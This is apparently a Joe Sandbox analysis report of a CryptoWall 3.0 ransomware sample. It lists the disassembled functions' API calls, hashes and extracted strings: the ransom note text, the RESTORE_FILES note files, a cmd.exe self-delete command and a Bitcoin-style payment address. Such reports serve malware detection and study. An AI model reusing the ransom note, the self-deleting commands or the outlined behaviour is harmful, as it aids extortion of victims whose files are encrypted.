                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset
                                                                                                                            • String ID: P6C$gfff
                                                                                                                            • API String ID: 2102423945-1005010341
                                                                                                                            • Opcode ID: 3a449d1c1157dbdbdf29ec6951557a5515a362dce761f230ceae7394c646bca1
                                                                                                                            • Instruction ID: 6c3f72de7210157f29cf342e4d814f1a2669bf009d892c6013dbe885ee46713a
                                                                                                                            • Opcode Fuzzy Hash: 3a449d1c1157dbdbdf29ec6951557a5515a362dce761f230ceae7394c646bca1
                                                                                                                            • Instruction Fuzzy Hash: 1491D371A097418BC704CF69DC80AABBBE9AFC4310F044A2EF985D7251E778D954CB9B
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004253FE), ref: 004276C7
                                                                                                                            • __mtterm.LIBCMT ref: 004276D3
                                                                                                                              • Part of subcall function 0042740C: DecodePointer.KERNEL32(00000004,00427835,?,004253FE), ref: 0042741D
                                                                                                                              • Part of subcall function 0042740C: TlsFree.KERNEL32(0000001D,00427835,?,004253FE), ref: 00427437
                                                                                                                              • Part of subcall function 0042740C: DeleteCriticalSection.KERNEL32(00000000,00000000,774EB15F,?,00427835,?,004253FE), ref: 0042A3A8
                                                                                                                              • Part of subcall function 0042740C: _free.LIBCMT ref: 0042A3AB
                                                                                                                              • Part of subcall function 0042740C: DeleteCriticalSection.KERNEL32(0000001D,774EB15F,?,00427835,?,004253FE), ref: 0042A3D2
                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,004253FE), ref: 004276E9
                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsGetValue,?,004253FE), ref: 004276F6
                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsSetValue,?,004253FE), ref: 00427703
                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsFree,?,004253FE), ref: 00427710
                                                                                                                            • TlsAlloc.KERNEL32(?,004253FE), ref: 00427760
                                                                                                                            • TlsSetValue.KERNEL32(00000000,?,004253FE), ref: 0042777B
                                                                                                                            • __init_pointers.LIBCMT ref: 00427785
                                                                                                                            • EncodePointer.KERNEL32(?,004253FE), ref: 00427796
                                                                                                                            • EncodePointer.KERNEL32(?,004253FE), ref: 004277A3
                                                                                                                            • EncodePointer.KERNEL32(?,004253FE), ref: 004277B0
                                                                                                                            • EncodePointer.KERNEL32(?,004253FE), ref: 004277BD
                                                                                                                            • DecodePointer.KERNEL32(00427590,?,004253FE), ref: 004277DE
                                                                                                                            • __calloc_crt.LIBCMT ref: 004277F3
                                                                                                                            • DecodePointer.KERNEL32(00000000,?,004253FE), ref: 0042780D
                                                                                                                            • GetCurrentThreadId.KERNEL32(?,004253FE), ref: 0042781F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                            • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                            • API String ID: 3698121176-3819984048
                                                                                                                            • Opcode ID: 2c00df72389e25008aa3955e646ae281114fcde81ecd68603a9de3682211893b
                                                                                                                            • Instruction ID: 9b151dc2d0a7d3be963eb5d747ef86db4f4cbe53b6bb54432aefd0192dcc4281
                                                                                                                            • Opcode Fuzzy Hash: 2c00df72389e25008aa3955e646ae281114fcde81ecd68603a9de3682211893b
                                                                                                                            • Instruction Fuzzy Hash: 8D311C31A052219EDB15BB79BC087567FE9EF48770B58253BE610922B0DB789441CF9C
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0041D231
                                                                                                                            • _memset.LIBCMT ref: 0041D244
                                                                                                                            • _memset.LIBCMT ref: 0041D257
                                                                                                                            • GetEnvironmentVariableW.KERNEL32(windir,?,00000208), ref: 0041D270
                                                                                                                              • Part of subcall function 0041D1A0: _vsnwprintf.NTDLL ref: 0041D1CF
                                                                                                                            • _memset.LIBCMT ref: 0041D2E2
                                                                                                                            • ShellExecuteExW.SHELL32(?), ref: 0041D337
                                                                                                                            • GetLastError.KERNEL32 ref: 0041D350
                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 0041D35E
                                                                                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 0041D367
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0041D376
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$ExecuteShell$CloseEnvironmentErrorHandleLastSleepVariable_vsnwprintf
                                                                                                                            • String ID: /c start "" "%s"$%s\system32\cmd.exe$<$@$DfC$windir
                                                                                                                            • API String ID: 3370961082-4193238480
                                                                                                                            • Opcode ID: f2a34d7a4750ee32f4e6a2d65ecff6902c3b24ff8586a7ff68a1e64aa6f790ce
                                                                                                                            • Instruction ID: 9fd5859a90402e78b6874ceda3f8e209096e6d3a03dae52f113e5a618079a305
                                                                                                                            • Opcode Fuzzy Hash: f2a34d7a4750ee32f4e6a2d65ecff6902c3b24ff8586a7ff68a1e64aa6f790ce
                                                                                                                            • Instruction Fuzzy Hash: 5A31A5F1E0021CA6DB20DB55DC45FDA73B8EB48704F4085AAE648E6181DB799AC4CFED
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0041DC8E
                                                                                                                            • CreateFileW.KERNEL32 ref: 0041DCEA
                                                                                                                            • WriteFile.KERNEL32(00000000,______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________What happened to your files ?All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.More information about the encryption keys using RSA-2048 can be found h,______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________What happened to your files ?All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.More information about the encryption keys using RSA-2048 can be found h,00000000,00000000), ref: 0041DD24
                                                                                                                            • FlushFileBuffers.KERNEL32(00000000), ref: 0041DD2D
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041DD30
                                                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 0041DD83
                                                                                                                            • WriteFile.KERNEL32(00000000,<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family,<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family,?,00000000), ref: 0041DDB1
                                                                                                                            • FlushFileBuffers.KERNEL32(00000000,?,?,?,?,?,?,?,756F3475,?,0041DAE7), ref: 0041DDB4
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041DDB7
                                                                                                                            Strings
                                                                                                                            • \RESTORE_FILES.TXT, xrefs: 0041DCAE
                                                                                                                            • <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family, xrefs: 0041DD90, 0041DDAA, 0041DDAB
                                                                                                                            • ______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________What happened to your files ?All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.More information about the encryption keys using RSA-2048 can be found h, xrefs: 0041DCFB, 0041DD1D, 0041DD1E
                                                                                                                            • \RESTORE_FILES.HTML, xrefs: 0041DD51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$BuffersCloseCreateFlushHandleWrite$_memset
                                                                                                                            • String ID: <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family$\RESTORE_FILES.HTML$\RESTORE_FILES.TXT$______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________What happened to your files ?All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.More information about the encryption keys using RSA-2048 can be found h
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0041E300: GetDC.USER32(00000000), ref: 0041E30E
                                                                                                                              • Part of subcall function 0041E300: CreateCompatibleBitmap.GDI32(00000000,0000047E,000002BC), ref: 0041E35A
                                                                                                                              • Part of subcall function 0041E300: CreateCompatibleDC.GDI32(00000000), ref: 0041E367
                                                                                                                              • Part of subcall function 0041E300: SelectObject.GDI32(00000000,00000000), ref: 0041E375
                                                                                                                              • Part of subcall function 0041E300: SetBkMode.GDI32(00000000,00000001), ref: 0041E381
                                                                                                                              • Part of subcall function 0041E300: SetTextColor.GDI32(00000000,00FFFFFF), ref: 0041E38D
                                                                                                                              • Part of subcall function 0041E300: SelectObject.GDI32(00000000,75D53C29), ref: 0041E3A0
                                                                                                                              • Part of subcall function 0041E300: DeleteDC.GDI32(00000000), ref: 0041E3A7
                                                                                                                              • Part of subcall function 0041E300: ReleaseDC.USER32(00000000,00000000), ref: 0041E3BA
                                                                                                                              • Part of subcall function 0041E300: DeleteObject.GDI32(00000000), ref: 0041E3CB
                                                                                                                            • GetDC.USER32(00000000), ref: 0041E4A2
                                                                                                                            • GetDIBits.GDI32 ref: 0041E4DB
                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0041E4E4
                                                                                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0041E522
                                                                                                                            • WriteFile.KERNEL32(00000000,?,0000000E,?,00000000), ref: 0041E53E
                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000028,?,00000000), ref: 0041E55B
                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0041E573
                                                                                                                            • FlushFileBuffers.KERNEL32(00000000), ref: 0041E57A
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041E581
                                                                                                                            • DeleteObject.GDI32(?), ref: 0041E595
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Object$CreateDeleteWrite$CompatibleReleaseSelect$BitmapBitsBuffersCloseColorFlushHandleModeText
                                                                                                                            • String ID: ($6
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004010A0: std::exception::exception.LIBCMT ref: 00401116
                                                                                                                              • Part of subcall function 004010A0: __CxxThrowException@8.LIBCMT ref: 0040112B
                                                                                                                            • std::exception::exception.LIBCMT ref: 00401514
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0040152F
                                                                                                                            • std::exception::exception.LIBCMT ref: 00401573
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00401588
                                                                                                                            • std::exception::exception.LIBCMT ref: 0040171A
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0040172F
                                                                                                                            • std::exception::exception.LIBCMT ref: 00401777
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0040178C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Exception@8Throwstd::exception::exception
                                                                                                                            • String ID: failed$4C$4C
                                                                                                                            APIs
                                                                                                                            • GetDC.USER32(00000000), ref: 0041E30E
                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,0000047E,000002BC), ref: 0041E35A
                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 0041E367
                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041E375
                                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 0041E381
                                                                                                                            • SetTextColor.GDI32(00000000,00FFFFFF), ref: 0041E38D
                                                                                                                              • Part of subcall function 0041E280: CreateFontW.GDI32(00000012,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000020,Tahoma), ref: 0041E2A3
                                                                                                                              • Part of subcall function 0041E280: SelectObject.GDI32(00000000,00000000), ref: 0041E2AD
                                                                                                                              • Part of subcall function 0041E280: DrawTextA.USER32(00000000,______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________What happened to your files ?All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.More information about the encryption keys using RSA-2048 can be found h,000000FF,?,00000400), ref: 0041E2CE
                                                                                                                              • Part of subcall function 0041E280: DrawTextA.USER32(00000000,______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________What happened to your files ?All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.More information about the encryption keys using RSA-2048 can be found h,000000FF,?,00000010), ref: 0041E2DF
                                                                                                                              • Part of subcall function 0041E280: GetStockObject.GDI32(0000000D), ref: 0041E2E7
                                                                                                                              • Part of subcall function 0041E280: SelectObject.GDI32(00000000,00000000), ref: 0041E2EF
                                                                                                                              • Part of subcall function 0041E280: DeleteObject.GDI32(00000000), ref: 0041E2F6
                                                                                                                            • SelectObject.GDI32(00000000,75D53C29), ref: 0041E3A0
                                                                                                                            • DeleteDC.GDI32(00000000), ref: 0041E3A7
                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0041E3BA
                                                                                                                            • DeleteObject.GDI32(00000000), ref: 0041E3CB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Object$Select$CreateDeleteText$CompatibleDraw$BitmapColorFontModeReleaseStock
                                                                                                                            • String ID: u4ou
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0040210C
                                                                                                                            • _memset.LIBCMT ref: 00402126
                                                                                                                            • _free.LIBCMT ref: 0040237B
                                                                                                                            • _memset.LIBCMT ref: 00402448
                                                                                                                              • Part of subcall function 0041B9A0: _memmove.LIBCMT ref: 0041B9DF
                                                                                                                              • Part of subcall function 0041BA80: _memset.LIBCMT ref: 0041BAA8
                                                                                                                              • Part of subcall function 0041BA80: _memset.LIBCMT ref: 0041BAD1
                                                                                                                              • Part of subcall function 0041BA80: _memset.LIBCMT ref: 0041BB24
                                                                                                                              • Part of subcall function 0041F020: _memset.LIBCMT ref: 0041F047
                                                                                                                              • Part of subcall function 00402740: memmove.NTDLL(?,00000000,?,0040253A), ref: 00402773
                                                                                                                            • _memmove.LIBCMT ref: 00402573
                                                                                                                            • __time64.LIBCMT ref: 00402580
                                                                                                                            Strings
                                                                                                                            • lIC, xrefs: 004022E4
                                                                                                                            • 30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC, xrefs: 00402370
                                                                                                                            • 1FQ2d43QjTT8zSrWe41EdxtvcVUMWyryJB, xrefs: 0040256E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$_memmove$__time64_freememmove
                                                                                                                            • String ID: 1FQ2d43QjTT8zSrWe41EdxtvcVUMWyryJB$30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC$lIC
                                                                                                                            • API String ID: 2817571782-161570552
                                                                                                                            • Opcode ID: f6b00c6a2980c6208534005260397c9b22fa4c23e7baa0cca0850e16493b7354
                                                                                                                            • Instruction ID: 4aa5ae40cc9d391a8dbd0e541590addac9a07c332d60b5f638ed022fa75e1140
                                                                                                                            • Opcode Fuzzy Hash: f6b00c6a2980c6208534005260397c9b22fa4c23e7baa0cca0850e16493b7354
                                                                                                                            • Instruction Fuzzy Hash: CBF1F1B15083809BC320EF65DC81A9BB7E4AFD8308F04493EF58967381E7799945CB9B
                                                                                                                            APIs
                                                                                                                            • CreateFontW.GDI32(00000012,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000020,Tahoma), ref: 0041E2A3
                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041E2AD
                                                                                                                            • DrawTextA.USER32(00000000,______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________What happened to your files ?All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.More information about the encryption keys using RSA-2048 can be found h,000000FF,?,00000400), ref: 0041E2CE
                                                                                                                            • DrawTextA.USER32(00000000,______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________What happened to your files ?All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.More information about the encryption keys using RSA-2048 can be found h,000000FF,?,00000010), ref: 0041E2DF
                                                                                                                            • GetStockObject.GDI32(0000000D), ref: 0041E2E7
                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041E2EF
                                                                                                                            • DeleteObject.GDI32(00000000), ref: 0041E2F6
                                                                                                                            Strings
                                                                                                                            • Tahoma, xrefs: 0041E281
                                                                                                                            • ______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________What happened to your files ?All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.More information about the encryption keys using RSA-2048 can be found h, xrefs: 0041E2BB, 0041E2D9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: Object$DrawSelectText$CreateDeleteFontStock
                                                                                                                            • String ID: Tahoma$______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________What happened to your files ?All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.More information about the encryption keys using RSA-2048 can be found h
                                                                                                                            • API String ID: 176621763-1021506374
                                                                                                                            • Opcode ID: 78fb551cc925bca32b6682d08aa59f00d074fd96ace1d11ac32abfdeda7ad996
                                                                                                                            • Instruction ID: 007f58ff4962ad56c78a0c5f32a044bb907f91f90d0d163fefc4750496c2c755
                                                                                                                            • Opcode Fuzzy Hash: 78fb551cc925bca32b6682d08aa59f00d074fd96ace1d11ac32abfdeda7ad996
                                                                                                                            • Instruction Fuzzy Hash: 9CF01D703C4300BBF6201BA09C8FF6B3A68EB0AF51F301119B312BC1E1C6E464455A2D
                                                                                                                            APIs
                                                                                                                            • WNetOpenEnumW.MPR(00000002,00000000,00000000,T9A,T9A), ref: 00413692
                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00004000,00000000), ref: 004136AB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocEnumGlobalOpen
                                                                                                                            • String ID: T9A
                                                                                                                            • API String ID: 3336353811-2611717058
                                                                                                                            • Opcode ID: 0a98321caf750293ecd154e3b48eea01ba96f44a2e89559002fe1efbabe4bb41
                                                                                                                            • Instruction ID: 6d7f72055025c7b0be6fe11486413a1798db894e983857bc46ed2fd87d8a8497
                                                                                                                            • Opcode Fuzzy Hash: 0a98321caf750293ecd154e3b48eea01ba96f44a2e89559002fe1efbabe4bb41
                                                                                                                            • Instruction Fuzzy Hash: 1731C7F2900204BBEB20DF94DC45BEBB76CEB55311F10426AE904A7380D6755F85CB98
                                                                                                                            APIs
                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00001000,?,0041E020), ref: 0041E075
                                                                                                                            • GetShortPathNameW.KERNEL32(?,?,00001000,?,0041E020), ref: 0041E092
                                                                                                                            • GetEnvironmentVariableW.KERNEL32(ComSpec,?,00001000,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 0041E0FD
                                                                                                                            • ShellExecuteW.SHELL32(00000000,00000000,?,?,00000000,00000000), ref: 0041E11D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: Name$EnvironmentExecuteFileModulePathShellShortVariable
                                                                                                                            • String ID: >> NUL$/c del $ComSpec
                                                                                                                            • API String ID: 1296078269-547624796
                                                                                                                            • Opcode ID: 8b3b51dccad2e54022be03ab2b0c10837a6ec2c4e4d1ea9283e6ec6af23a601c
                                                                                                                            • Instruction ID: a9eb13e3e64ffb1a7c6eb7d3c2949bb5ef406e474b692f1edf18b5435e39ebdc
                                                                                                                            • Opcode Fuzzy Hash: 8b3b51dccad2e54022be03ab2b0c10837a6ec2c4e4d1ea9283e6ec6af23a601c
                                                                                                                            • Instruction Fuzzy Hash: 4221A774740218B6E714DB61DD86FE97378DB0C741F404099F705E61C1DAB8AA848B5C
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: Load$Icon$ClassCursorRegister
                                                                                                                            • String ID: 0$SCAN$m
                                                                                                                            • API String ID: 4202395251-3574835850
                                                                                                                            • Opcode ID: 627f741942ed8ffa665dcbac24e0f7554396b1014172c2ecc967683f971c8674
                                                                                                                            • Instruction ID: cd2708527f8c9ff307f3812adb0760e774757ce43e84b82f15cc096565d65217
                                                                                                                            • Opcode Fuzzy Hash: 627f741942ed8ffa665dcbac24e0f7554396b1014172c2ecc967683f971c8674
                                                                                                                            • Instruction Fuzzy Hash: 2201F6B0C10218ABEB00DFE4D819BDFBFB8EB08304F10415AE904B7290D7BA16148FD8
                                                                                                                            APIs
                                                                                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 0041E960
                                                                                                                            • DefWindowProcW.USER32(?,00000111,?,?), ref: 0041E991
                                                                                                                            • BeginPaint.USER32(?,?), ref: 0041E9F5
                                                                                                                            • EndPaint.USER32(?,?), ref: 0041EA01
                                                                                                                            • PostQuitMessage.USER32(00000000), ref: 0041EA1D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: PaintProcWindow$BeginMessagePostQuit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3181456275-0
                                                                                                                            • Opcode ID: cb681f4638388885bc1e2f9ed1f61d75574201e5c8038efff34d4deca7bd3fbd
                                                                                                                            • Instruction ID: 6c2d3888f3e435d877acf54aaf2b45d1e93d16ee1ac06b446370fa4d32732ff5
                                                                                                                            • Opcode Fuzzy Hash: cb681f4638388885bc1e2f9ed1f61d75574201e5c8038efff34d4deca7bd3fbd
